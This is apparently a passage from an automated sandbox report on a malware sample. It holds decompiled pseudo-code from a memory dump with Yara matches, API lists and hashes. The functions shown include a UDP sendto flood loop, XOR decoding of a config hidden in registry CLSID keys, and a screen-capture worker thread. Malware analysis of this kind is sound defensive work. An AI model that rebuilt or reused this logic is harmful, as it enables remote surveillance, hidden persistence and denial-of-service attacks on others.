                                                                                    							if( *((intOrPtr*)(_t77 + 0x37c)) != 0) {
                                                                                    								L14:
                                                                                    								_push(0x80004005);
                                                                                    								E04EB7AB0();
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								asm("int3");
                                                                                    								_push(_t80);
                                                                                    								_t81 = _t68;
                                                                                    								_t44 =  *(_t81 + 0x84);
                                                                                    								__eflags = _t44;
                                                                                    								if(_t44 != 0) {
                                                                                    									HeapDestroy(_t44);
                                                                                    								}
                                                                                    								 *(_t81 + 0x84) = HeapCreate( *(_t81 + 0x88),  *(_t81 + 0x8c),  *(_t81 + 0x90));
                                                                                    								asm("xorps xmm0, xmm0");
                                                                                    								asm("movups [esi+0x5c], xmm0");
                                                                                    								asm("movq [esi+0x6c], xmm0");
                                                                                    								 *(_t81 + 0x74) = 0;
                                                                                    								 *(_t81 + 0x40) = 0;
                                                                                    								 *(_t81 + 0x44) = 0;
                                                                                    								 *((intOrPtr*)(_t81 + 0x54)) = 3;
                                                                                    								return SetEvent( *(_t81 + 0x3c));
                                                                                    							} else {
                                                                                    								E04EC0460(_t62, _t77 + 0xb0);
                                                                                    								_t53 =  *(_t77 + 0x94);
                                                                                    								if(_t53 != 0) {
                                                                                    									HeapDestroy(_t53);
                                                                                    								}
                                                                                    								 *(_t77 + 0x94) = HeapCreate( *(_t77 + 0x98),  *(_t77 + 0x9c),  *(_t77 + 0xa0));
                                                                                    								_t55 =  *(_t77 + 0x50);
                                                                                    								if(_t55 != 0) {
                                                                                    									CloseHandle(_t55);
                                                                                    									 *(_t77 + 0x50) = 0;
                                                                                    								}
                                                                                    								 *((intOrPtr*)( *_t77 + 0x120))();
                                                                                    								return 1;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000139F,?,00000000,04EBF876), ref: 04ED22FB
                                                                                      • Part of subcall function 04ECE8D0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04ECE8E5
                                                                                      • Part of subcall function 04ECE8D0: SwitchToThread.KERNEL32(?,?,00000000,04ECE352,?,00000000,04EB8415,74E5F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,04EB87E8), ref: 04ECE8FD
                                                                                    • HeapDestroy.KERNEL32(?), ref: 04ED229A
                                                                                    • HeapCreate.KERNEL32(?,?,?), ref: 04ED22B2
                                                                                    • CloseHandle.KERNEL32(?), ref: 04ED22C6
                                                                                    • HeapDestroy.KERNEL32(?,00000000,80004005,80004005), ref: 04ED232E
                                                                                    • HeapCreate.KERNEL32(?,?,?,00000000,80004005,80004005), ref: 04ED2346
                                                                                    • SetEvent.KERNEL32(80004005), ref: 04ED237D
                                                                                      • Part of subcall function 04ED3000: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000), ref: 04ED3039
                                                                                      • Part of subcall function 04ED3000: WaitForMultipleObjects.KERNEL32(00000040,?,00000001,000000FF), ref: 04ED308C
                                                                                      • Part of subcall function 04ED3000: CloseHandle.KERNEL32(?,?,00000001,000000FF), ref: 04ED30A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$CloseCreateDestroyHandle$CompareCompletionErrorEventExchangeInterlockedLastMultipleObjectsPostQueuedStatusSwitchThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 1858100233-0
                                                                                    • Opcode ID: 2461fc54e6186ae397fe7f2c9d5185597050cc21309906f3b86455f1670fb1fe
                                                                                    • Instruction ID: a9f1b86c879a3b7e58402517570765e6a0ddd7a61a1e2b4247ec747c60abed7f
                                                                                    • Opcode Fuzzy Hash: 2461fc54e6186ae397fe7f2c9d5185597050cc21309906f3b86455f1670fb1fe
                                                                                    • Instruction Fuzzy Hash: 76416D31200A02EFE718DF35D948BEAF7B5FF44309F04551DE65A82640DB74B566CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 37%
                                                                                    			E04EB3EF0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                    				signed int _v8;
                                                                                    				intOrPtr _v20;
                                                                                    				signed int _v22;
                                                                                    				char _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				intOrPtr _v32;
                                                                                    				signed int _v36;
                                                                                    				signed int _t47;
                                                                                    				signed int _t51;
                                                                                    				long _t56;
                                                                                    				intOrPtr _t57;
                                                                                    				intOrPtr _t66;
                                                                                    				struct _CRITICAL_SECTION* _t78;
                                                                                    				intOrPtr _t81;
                                                                                    				signed int _t82;
                                                                                    
                                                                                    				_t47 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t47 ^ _t82;
                                                                                    				_t81 = _a4;
                                                                                    				_v24 = 2;
                                                                                    				_t67 =  *((intOrPtr*)(_t81 + 4));
                                                                                    				_v20 =  *((intOrPtr*)(_t67 + 0xc));
                                                                                    				_t51 =  *(_t67 + 0x10) & 0x0000ffff;
                                                                                    				__imp__#9(_t51);
                                                                                    				_v22 = _t51;
                                                                                    				__imp__#23(2, 2, 0);
                                                                                    				_t65 = _t51;
                                                                                    				_v36 = _t51;
                                                                                    				if( *((char*)(_t81 + 1)) != 0) {
                                                                                    					do {
                                                                                    						_v32 = 0;
                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 0x24)) > 0) {
                                                                                    							do {
                                                                                    								_t66 =  *((intOrPtr*)(_t81 + 4));
                                                                                    								if( *((short*)(_t66 + 0x16)) != 3) {
                                                                                    									_t57 =  *((intOrPtr*)(_t66 + 0x1c));
                                                                                    									_v28 = _t57;
                                                                                    									if(_t57 !=  *((intOrPtr*)(_t66 + 0x18))) {
                                                                                    										_t79 =  *((intOrPtr*)(_t66 + 0x18));
                                                                                    										_t57 =  *((intOrPtr*)(_t66 + 0x18)) + E04EDEB76(_t67) % ( *((intOrPtr*)(_t66 + 0x1c)) - _t79 + 1);
                                                                                    										goto L7;
                                                                                    									}
                                                                                    								} else {
                                                                                    									_t57 =  *((intOrPtr*)(_t66 + 0x34));
                                                                                    									L7:
                                                                                    									_v28 = _t57;
                                                                                    								}
                                                                                    								_t67 =  &_v24;
                                                                                    								_t65 = _v36;
                                                                                    								__imp__#20(_v36,  *((intOrPtr*)(_t66 + 0x3c)), _t57, 0,  &_v24, 0x10);
                                                                                    								if(_t57 != 0xffffffff) {
                                                                                    									goto L9;
                                                                                    								}
                                                                                    								goto L12;
                                                                                    								L9:
                                                                                    								if( *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 8)) != 0) {
                                                                                    									_t78 = _t81 + 0x3c;
                                                                                    									EnterCriticalSection(_t78);
                                                                                    									asm("cdq");
                                                                                    									 *((intOrPtr*)(_t81 + 0x18)) =  *((intOrPtr*)(_t81 + 0x18)) + _v28 + 0x2e;
                                                                                    									asm("adc [esi+0x1c], edx");
                                                                                    									 *((intOrPtr*)(_t81 + 0x10)) =  *((intOrPtr*)(_t81 + 0x10)) + 1;
                                                                                    									asm("adc dword [esi+0x14], 0x0");
                                                                                    									LeaveCriticalSection(_t78);
                                                                                    								}
                                                                                    								_t67 = _v32 + 1;
                                                                                    								_v32 = _t67;
                                                                                    							} while (_t67 <  *((intOrPtr*)( *((intOrPtr*)(_t81 + 4)) + 0x24)));
                                                                                    						}
                                                                                    						L12:
                                                                                    						_t56 =  *( *((intOrPtr*)(_t81 + 4)) + 0x28);
                                                                                    						if(_t56 != 0) {
                                                                                    							Sleep(_t56);
                                                                                    						}
                                                                                    					} while ( *((char*)(_t81 + 1)) != 0);
                                                                                    				}
                                                                                    				__imp__#3();
                                                                                    				return E04ED572E(_v8 ^ _t82, _t65);
                                                                                    			}

                                                                                    APIs
                                                                                    • htons.WS2_32(?), ref: 04EB3F1C
                                                                                    • socket.WS2_32(00000002,00000002,00000000), ref: 04EB3F2C
                                                                                    • sendto.WS2_32(?,?,?,00000000,?,00000010), ref: 04EB3F98
                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 04EB3FB0
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04EB3FCC
                                                                                    • Sleep.KERNEL32(?), ref: 04EB3FF0
                                                                                    • closesocket.WS2_32(00000000), ref: 04EB4002
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$EnterLeaveSleepclosesockethtonssendtosocket
                                                                                    • String ID:
                                                                                    • API String ID: 920770778-0
                                                                                    • Opcode ID: 6d43b95af3eb13a539c5a6403b29ea7138a4a41df24a6206a3afc864f5823135
                                                                                    • Instruction ID: 61dedab01f177c45526ebbd99347c8d888059318c134176f35911cb676d9bb8a
                                                                                    • Opcode Fuzzy Hash: 6d43b95af3eb13a539c5a6403b29ea7138a4a41df24a6206a3afc864f5823135
                                                                                    • Instruction Fuzzy Hash: 39417770A00204AFDB24CFA4C98ABABB7F5FF48304F00950AE8969B681D774FD45CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E04ECAC30(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				void* _v612;
                                                                                    				int _v616;
                                                                                    				int _v620;
                                                                                    				signed int _t25;
                                                                                    				int _t52;
                                                                                    				void* _t55;
                                                                                    				void* _t56;
                                                                                    				char* _t64;
                                                                                    				signed int _t65;
                                                                                    
                                                                                    				_t60 = __edi;
                                                                                    				_t25 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t25 ^ _t65;
                                                                                    				_t64 = __ecx;
                                                                                    				E04EDDAD0(__edi, __ecx, 0, 0x190);
                                                                                    				_v616 = 0x190;
                                                                                    				E04EC6010(__ebx, L"Global",  &_v88, _t60, _t64);
                                                                                    				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                    				E04EDDAD0(0, _t64, 0, _v616);
                                                                                    				_v612 = 0;
                                                                                    				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
                                                                                    					L8:
                                                                                    					return E04ED572E(_v8 ^ _t65);
                                                                                    				} else {
                                                                                    					RegQueryValueExW(_v612, "2", 0,  &_v620, _t64,  &_v616);
                                                                                    					_t62 =  ==  ? 1 : 0;
                                                                                    					RegCloseKey(_v612);
                                                                                    					_t71 =  ==  ? 1 : 0;
                                                                                    					if(( ==  ? 1 : 0) == 0) {
                                                                                    						goto L8;
                                                                                    					} else {
                                                                                    						_t52 = _v616;
                                                                                    						if(_t52 > 1) {
                                                                                    							_t55 = _t52 - 1;
                                                                                    							 *(_t55 + _t64) =  *(_t55 + _t64) ^  *_t64;
                                                                                    							_t56 = _t55 - 1;
                                                                                    							while(_t56 != 0) {
                                                                                    								 *(_t56 + _t64) =  *(_t56 + _t64) ^  *(_t56 +  &(_t64[1]));
                                                                                    								_t56 = _t56 - 1;
                                                                                    							}
                                                                                    							 *(_t56 + _t64) =  *(_t56 + _t64) ^ (_t56 + _t64)[0];
                                                                                    						}
                                                                                    						return E04ED572E(_v8 ^ _t65);
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    0x04ecac30
                                                                                    0x04ecac39
                                                                                    0x04ecac40
                                                                                    0x04ecac4b
                                                                                    0x04ecac50
                                                                                    0x04ecac58
                                                                                    0x04ecac67
                                                                                    0x04ecac7c
                                                                                    0x04ecac8c
                                                                                    0x04ecac94
                                                                                    0x04ecacbb
                                                                                    0x04ecad36
                                                                                    0x04ecad48
                                                                                    0x04ecacbd
                                                                                    0x04ecacd8
                                                                                    0x04ecaceb
                                                                                    0x04ecacee
                                                                                    0x04ecacf4
                                                                                    0x04ecacf6
                                                                                    0x00000000
                                                                                    0x04ecacf8
                                                                                    0x04ecacf8
                                                                                    0x04ecad00
                                                                                    0x04ecad04
                                                                                    0x04ecad05
                                                                                    0x04ecad08
                                                                                    0x04ecad0a
                                                                                    0x04ecad14
                                                                                    0x04ecad17
                                                                                    0x04ecad17
                                                                                    0x04ecad21
                                                                                    0x04ecad21
                                                                                    0x04ecad35
                                                                                    0x04ecad35
                                                                                    0x04ecacf6

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04ECAC7C
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04ECACB3
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD124,00000000,?,?,?), ref: 04ECACD8
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04ECACEE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue$wsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 3615287298-1865207932
                                                                                    • Opcode ID: 7640e5219a8ce9ef4090fad2d5f1bffb8062191dc8a7581cd9e134921eaf299a
                                                                                    • Instruction ID: 0d7e2a6cb59a6e421bd8a6a8bc0b4809bda3e4faeb0a2e22f97bdefb5fbe3132
                                                                                    • Opcode Fuzzy Hash: 7640e5219a8ce9ef4090fad2d5f1bffb8062191dc8a7581cd9e134921eaf299a
                                                                                    • Instruction Fuzzy Hash: 6D31083160421CABDB209F64DD48FEFBBB9EF89309F5011EDE90A9B101D6726E45CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E04ECAB10(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _v8;
                                                                                    				char _v88;
                                                                                    				short _v608;
                                                                                    				void* _v612;
                                                                                    				int _v616;
                                                                                    				int _v620;
                                                                                    				signed int _t25;
                                                                                    				int _t52;
                                                                                    				void* _t55;
                                                                                    				void* _t56;
                                                                                    				char* _t64;
                                                                                    				signed int _t65;
                                                                                    
                                                                                    				_t60 = __edi;
                                                                                    				_t25 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v8 = _t25 ^ _t65;
                                                                                    				_t64 = __ecx;
                                                                                    				E04EDDAD0(__edi, __ecx, 0, 0x190);
                                                                                    				_v616 = 0x190;
                                                                                    				E04EC6010(__ebx, L"Global",  &_v88, _t60, _t64);
                                                                                    				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                    				E04EDDAD0(0, _t64, 0, _v616);
                                                                                    				_v612 = 0;
                                                                                    				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20119,  &_v612) != 0) {
                                                                                    					L8:
                                                                                    					return E04ED572E(_v8 ^ _t65);
                                                                                    				} else {
                                                                                    					RegQueryValueExW(_v612, "3", 0,  &_v620, _t64,  &_v616);
                                                                                    					_t62 =  ==  ? 1 : 0;
                                                                                    					RegCloseKey(_v612);
                                                                                    					_t71 =  ==  ? 1 : 0;
                                                                                    					if(( ==  ? 1 : 0) == 0) {
                                                                                    						goto L8;
                                                                                    					} else {
                                                                                    						_t52 = _v616;
                                                                                    						if(_t52 > 1) {
                                                                                    							_t55 = _t52 - 1;
                                                                                    							 *(_t55 + _t64) =  *(_t55 + _t64) ^  *_t64;
                                                                                    							_t56 = _t55 - 1;
                                                                                    							while(_t56 != 0) {
                                                                                    								 *(_t56 + _t64) =  *(_t56 + _t64) ^  *(_t56 +  &(_t64[1]));
                                                                                    								_t56 = _t56 - 1;
                                                                                    							}
                                                                                    							 *(_t56 + _t64) =  *(_t56 + _t64) ^ (_t56 + _t64)[0];
                                                                                    						}
                                                                                    						return E04ED572E(_v8 ^ _t65);
                                                                                    					}
                                                                                    				}
                                                                                    			}
                                                                                    0x04ecab10
                                                                                    0x04ecab19
                                                                                    0x04ecab20
                                                                                    0x04ecab2b
                                                                                    0x04ecab30
                                                                                    0x04ecab38
                                                                                    0x04ecab47
                                                                                    0x04ecab5c
                                                                                    0x04ecab6c
                                                                                    0x04ecab74
                                                                                    0x04ecab9b
                                                                                    0x04ecac16
                                                                                    0x04ecac28
                                                                                    0x04ecab9d
                                                                                    0x04ecabb8
                                                                                    0x04ecabcb
                                                                                    0x04ecabce
                                                                                    0x04ecabd4
                                                                                    0x04ecabd6
                                                                                    0x00000000
                                                                                    0x04ecabd8
                                                                                    0x04ecabd8
                                                                                    0x04ecabe0
                                                                                    0x04ecabe4
                                                                                    0x04ecabe5
                                                                                    0x04ecabe8
                                                                                    0x04ecabea
                                                                                    0x04ecabf4
                                                                                    0x04ecabf7
                                                                                    0x04ecabf7
                                                                                    0x04ecac01
                                                                                    0x04ecac01
                                                                                    0x04ecac15
                                                                                    0x04ecac15
                                                                                    0x04ecabd6

                                                                                    APIs
                                                                                      • Part of subcall function 04EC6010: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,00000378), ref: 04EC61B1
                                                                                      • Part of subcall function 04EC6010: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 04EC61DF
                                                                                      • Part of subcall function 04EC6010: RegCloseKey.ADVAPI32(?), ref: 04EC61F5
                                                                                    • wsprintfW.USER32 ref: 04ECAB5C
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?), ref: 04ECAB93
                                                                                    • RegQueryValueExW.ADVAPI32(?,04EFD120,00000000,?,?,?), ref: 04ECABB8
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 04ECABCE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CloseOpenQueryValue$wsprintf
                                                                                    • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                                                    • API String ID: 3615287298-1865207932
                                                                                    • Opcode ID: a131217ef19d2ab439bd7b784df14e30c911aed44ea955199700f8cf23824239
                                                                                    • Instruction ID: 77c63de5496dafb19ce8b4419d7134b714e551c354b2af1e1a1c5def43009721
                                                                                    • Opcode Fuzzy Hash: a131217ef19d2ab439bd7b784df14e30c911aed44ea955199700f8cf23824239
                                                                                    • Instruction Fuzzy Hash: F531E83560421CAFDB209F64DD88FEEBBB9EF88304F5011EDE94A9B101D6326E45CB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 63%
                                                                                    			E04EC19F0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                    				signed int _v12;
                                                                                    				void* _v84;
                                                                                    				char _v88;
                                                                                    				intOrPtr _v92;
                                                                                    				char _v96;
                                                                                    				signed int _t29;
                                                                                    				intOrPtr _t31;
                                                                                    				void* _t32;
                                                                                    				struct HICON__* _t34;
                                                                                    				void* _t35;
                                                                                    				intOrPtr _t36;
                                                                                    				intOrPtr _t39;
                                                                                    				intOrPtr* _t45;
                                                                                    				struct HICON__** _t51;
                                                                                    				signed int _t53;
                                                                                    				signed int _t55;
                                                                                    
                                                                                    				_t29 =  *0x4f03008; // 0x3d21fb31
                                                                                    				_v12 = _t29 ^ _t55;
                                                                                    				_t31 = _a4;
                                                                                    				_t45 = __ecx;
                                                                                    				 *__ecx = 0x4efd8b0;
                                                                                    				 *((intOrPtr*)(__ecx + 4)) = _t31;
                                                                                    				 *((intOrPtr*)(_t31 + 0x38)) = __ecx;
                                                                                    				_t32 = CreateEventW(0, 1, 0, 0);
                                                                                    				asm("movaps xmm0, [0x4efe8b0]");
                                                                                    				_t51 = _t45 + 0x70;
                                                                                    				asm("movups [ebp-0x4c], xmm0");
                                                                                    				_t53 = 0;
                                                                                    				 *(_t45 + 8) = _t32;
                                                                                    				asm("movaps xmm0, [0x4efe8a0]");
                                                                                    				asm("movups [ebp-0x3c], xmm0");
                                                                                    				 *_t45 = 0x4efdca4;
                                                                                    				asm("movaps xmm0, [0x4efe890]");
                                                                                    				asm("movups [ebp-0x2c], xmm0");
                                                                                    				 *((intOrPtr*)(_t45 + 0x2c)) = 0x4efdc9c;
                                                                                    				asm("movaps xmm0, [0x4efe880]");
                                                                                    				asm("movups [ebp-0x1c], xmm0");
                                                                                    				do {
                                                                                    					 *(_t51 - 0x40) =  *(_t55 + _t53 * 4 - 0x4c);
                                                                                    					_t34 = LoadCursorW(0,  *(_t55 + _t53 * 4 - 0x4c));
                                                                                    					_t53 = _t53 + 1;
                                                                                    					 *_t51 = _t34;
                                                                                    					_t51 =  &(_t51[1]);
                                                                                    					_t58 = _t53 - 0x10;
                                                                                    				} while (_t53 < 0x10);
                                                                                    				 *((char*)(_t45 + 0x18)) = 2;
                                                                                    				 *((intOrPtr*)(_t45 + 0x20)) = 0x20;
                                                                                    				_t35 = E04ED5744(_t53, _t58, 0x108);
                                                                                    				_push(0);
                                                                                    				_t36 = E04EC23B0(_t45, _t35, _t51, _t53);
                                                                                    				asm("movsd xmm0, [0x4efe870]");
                                                                                    				 *((intOrPtr*)(_t45 + 0xb0)) = _t36;
                                                                                    				 *((char*)(_t45 + 0xc)) = 1;
                                                                                    				 *(_t45 + 0x14) = 0;
                                                                                    				 *(_t45 + 0x10) = 0;
                                                                                    				 *(_t45 + 0x1c) = 0;
                                                                                    				asm("movsd [ebx+0xb8], xmm0");
                                                                                    				_v96 = E04EC2010;
                                                                                    				_v92 = _t45;
                                                                                    				_v88 = 1;
                                                                                    				// Start-up handshake: an auto-reset, initially unsignalled event is placed in the
                                                                                    				// thread argument block {_v96 = E04EC2010, _v92 = object, _v88 = 1, _v84 = event}.
                                                                                    				// The caller blocks until the new thread (entry E04EC53C0) signals the event,
                                                                                    				// then discards it; the thread itself keeps running.
                                                                                    				_v84 = CreateEventW(0, 0, 0, 0);
                                                                                    				_t39 = E04EDF4C7(_t35, 0, 0, E04EC53C0,  &_v96, 0, 0);
                                                                                    				WaitForSingleObject(_v84, 0xffffffff);
                                                                                    				CloseHandle(_v84);
                                                                                    				// The value returned by E04EDF4C7 is kept at +0x24. E04EC1BF0 below waits on it
                                                                                    				// with WaitForSingleObject and closes it, so it is the worker thread's handle.
                                                                                    				 *((intOrPtr*)(_t45 + 0x24)) = _t39;
                                                                                    				return E04ED572E(_v12 ^ _t55, 0x20);
                                                                                    			}



















                                                                                    0x04ec19f6
                                                                                    0x04ec19fd
                                                                                    0x04ec1a00
                                                                                    0x04ec1a08
                                                                                    0x04ec1a10
                                                                                    0x04ec1a16
                                                                                    0x04ec1a19
                                                                                    0x04ec1a1c
                                                                                    0x04ec1a22
                                                                                    0x04ec1a29
                                                                                    0x04ec1a2c
                                                                                    0x04ec1a30
                                                                                    0x04ec1a32
                                                                                    0x04ec1a35
                                                                                    0x04ec1a3c
                                                                                    0x04ec1a40
                                                                                    0x04ec1a46
                                                                                    0x04ec1a4d
                                                                                    0x04ec1a51
                                                                                    0x04ec1a58
                                                                                    0x04ec1a5f
                                                                                    0x04ec1a63
                                                                                    0x04ec1a6a
                                                                                    0x04ec1a6d
                                                                                    0x04ec1a73
                                                                                    0x04ec1a74
                                                                                    0x04ec1a76
                                                                                    0x04ec1a79
                                                                                    0x04ec1a79
                                                                                    0x04ec1a83
                                                                                    0x04ec1a87
                                                                                    0x04ec1a8e
                                                                                    0x04ec1a93
                                                                                    0x04ec1a99
                                                                                    0x04ec1a9e
                                                                                    0x04ec1aae
                                                                                    0x04ec1ab4
                                                                                    0x04ec1ab8
                                                                                    0x04ec1abf
                                                                                    0x04ec1ac6
                                                                                    0x04ec1acd
                                                                                    0x04ec1ad5
                                                                                    0x04ec1adc
                                                                                    0x04ec1adf
                                                                                    0x04ec1aed
                                                                                    0x04ec1afd
                                                                                    0x04ec1b0c
                                                                                    0x04ec1b15
                                                                                    0x04ec1b21
                                                                                    0x04ec1b30

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EC1A1C
                                                                                    • LoadCursorW.USER32(00000000,?), ref: 04EC1A6D
                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000020,00000000,00000108), ref: 04EC1AE3
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC1B0C
                                                                                    • CloseHandle.KERNEL32(?), ref: 04EC1B15
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateEvent$CloseCursorHandleLoadObjectSingleWait
                                                                                    • String ID:
                                                                                    • API String ID: 3220371329-3916222277
                                                                                    • Opcode ID: e0a76ff83a9426cc56699a7de2ae44c466bc47ee055e8bd6a28a78c509aa970f
                                                                                    • Instruction ID: 2f35f725f3498b1489c8f5715ce72fbe63d1e2b0ed47016498493ccdc00c8b90
                                                                                    • Opcode Fuzzy Hash: e0a76ff83a9426cc56699a7de2ae44c466bc47ee055e8bd6a28a78c509aa970f
                                                                                    • Instruction Fuzzy Hash: 5B41A471D00344AFEB019FA9DC857AABBB0FF44705F005259EE046F29ADBB5A981CB80
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 55%
                                                                                    			E04EC1BF0(intOrPtr __ecx, intOrPtr _a4) {
                                                                                    				void* _v20;
                                                                                    				char _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				char _v32;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* _t23;
                                                                                    				void* _t36;
                                                                                    				int _t38;
                                                                                    				intOrPtr _t42;
                                                                                    				intOrPtr* _t45;
                                                                                    				intOrPtr _t49;
                                                                                    				void* _t51;
                                                                                    
                                                                                    				_push(_t51);
                                                                                    				_t49 = __ecx;
                                                                                    				 *((char*)(__ecx + 0xc)) = 0;	// clear the run flag (set to 1 by the start routine) so the worker exits
                                                                                    				WaitForSingleObject( *(__ecx + 0x24), 0xffffffff);	// join the worker thread whose handle is stored at +0x24
                                                                                    				CloseHandle( *(_t49 + 0x24));
                                                                                    				_t45 =  *((intOrPtr*)(_t49 + 0xb0));
                                                                                    				_t59 = _t45;
                                                                                    				if(_t45 != 0) {
                                                                                    					// vtable slot 0 called with 1: consistent with MSVC's scalar deleting
                                                                                    					// destructor, i.e. the old object at +0xb0 is destroyed and freed here.
                                                                                    					 *((intOrPtr*)( *_t45))(1);
                                                                                    				}
                                                                                    				_t42 = _a4;
                                                                                    				_t23 = E04ED5744(_t51, _t59, 0x108);
                                                                                    				// Map the requested mode for the factory call below: 3 -> (4, 1), 7 -> (8, 1), anything else -> (mode, 0).
                                                                                    				if(_t42 != 3) {
                                                                                    					__eflags = _t42 - 7;
                                                                                    					if(_t42 != 7) {
                                                                                    						_push(0);
                                                                                    						_push(_t42);
                                                                                    					} else {
                                                                                    						_push(1);
                                                                                    						_push(8);
                                                                                    					}
                                                                                    				} else {
                                                                                    					_push(1);
                                                                                    					_push(4);
                                                                                    				}
                                                                                    				 *((intOrPtr*)(_t49 + 0xb0)) = E04EC23B0(_t42, _t23, _t49, _t51);	// build the replacement object
                                                                                    				InterlockedExchange( *((intOrPtr*)(_t49 + 0xb0)) + 4,  *(_t49 + 0x18) & 0x000000ff);	// copy the byte at +0x18 (2 in the start routine) into it
                                                                                    				// 0x00CC0020 is the BitBlt raster operation SRCCOPY; 0x40CC0020 is SRCCOPY | CAPTUREBLT
                                                                                    				// (0x40000000), the variant that includes layered windows when copying from the screen.
                                                                                    				// The condition that selects between them was not recovered by the decompiler.
                                                                                    				_t30 =  ==  ? 0xcc0020 : 0x40cc0020;
                                                                                    				InterlockedExchange( *((intOrPtr*)(_t49 + 0xb0)) + 0x10,  ==  ? 0xcc0020 : 0x40cc0020);
                                                                                    				 *((intOrPtr*)(_t49 + 0x20)) = _t42;
                                                                                    				 *((char*)(_t49 + 0xc)) = 1;	// run flag back on
                                                                                    				// Same start-up handshake as the start routine: pass {E04EC2010, object, 1, event}
                                                                                    				// to a new thread with entry E04EC53C0, wait for it to signal, store its handle at +0x24.
                                                                                    				_v32 = E04EC2010;
                                                                                    				_v28 = _t49;
                                                                                    				_v24 = 1;
                                                                                    				_v20 = CreateEventW(0, 0, 0, 0);
                                                                                    				_t36 = E04EDF4C7(0xcc0020, 0, 0, E04EC53C0,  &_v32, 0, 0);
                                                                                    				WaitForSingleObject(_v20, 0xffffffff);
                                                                                    				_t38 = CloseHandle(_v20);
                                                                                    				 *(_t49 + 0x24) = _t36;
                                                                                    				return _t38;
                                                                                    			}

















                                                                                    0x04ec1bfa
                                                                                    0x04ec1bfc
                                                                                    0x04ec1c03
                                                                                    0x04ec1c07
                                                                                    0x04ec1c10
                                                                                    0x04ec1c16
                                                                                    0x04ec1c1c
                                                                                    0x04ec1c1e
                                                                                    0x04ec1c24
